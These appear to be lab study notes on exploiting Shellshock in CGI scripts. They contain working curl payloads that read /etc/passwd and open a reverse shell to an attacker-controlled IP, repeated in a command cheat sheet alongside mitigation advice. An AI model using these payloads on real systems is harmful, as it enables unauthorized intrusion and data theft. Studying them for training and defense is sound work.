18.-Attacking-cgi-applications-shellshock

1. Vulnerability Overview

CVE-2014-6271 - Shellshock

  • Description: A critical vulnerability in Bash that allows arbitrary command execution through manipulated environment variables.

  • Cause: Bash versions up to 4.3 improperly handle function definitions in environment variables.

  • Impact: Can lead to remote code execution in the context of the web server user, often via CGI scripts.

2. Enumeration

Discover CGI Scripts (Gobuster)

Identify potential vulnerable scripts in the /cgi-bin/ directory.

gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi

Verify CGI Script Accessibility (cURL)

Check for an active CGI script that could be vulnerable.

curl -i http://10.129.204.231/cgi-bin/access.cgi

3. Exploitation

Confirm Vulnerability (cURL)

Inject a malicious function definition into the User-Agent header to read the /etc/passwd file.

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.129.204.231/cgi-bin/access.cgi

Execute a Reverse Shell (cURL)

Inject a reverse shell payload into the User-Agent header.

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi

Set Up a Netcat Listener

Prepare to catch the reverse shell on port 7777.

sudo nc -lvnp 7777

4. Mitigation

Update Bash

Upgrade to a patched Bash version to close the vulnerability.

Firewalling

Restrict external access to CGI scripts via firewall rules.

Decommission Vulnerable Hosts

If possible, remove or replace outdated systems running vulnerable Bash versions.

5. Key Takeaways

  • Shellshock is exploited via environment variables, often targeting CGI scripts.

  • The User-Agent header is a common attack vector for injecting payloads.

  • Updating Bash is the best way to mitigate the vulnerability.

  • Always test only with explicit permission.

  • Replace IP addresses and ports with target-specific information.

6. Commands Summary

# Gobuster - Discover CGI scripts
gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi

# cURL - Verify CGI script accessibility
curl -i http://10.129.204.231/cgi-bin/access.cgi

# cURL - Confirm vulnerability
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.129.204.231/cgi-bin/access.cgi

# cURL - Execute reverse shell
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi

# Netcat listener
sudo nc -lvnp 7777
Previous17.-Attacking-tomcat-cgiNext6. Thick Client Applications

Last updated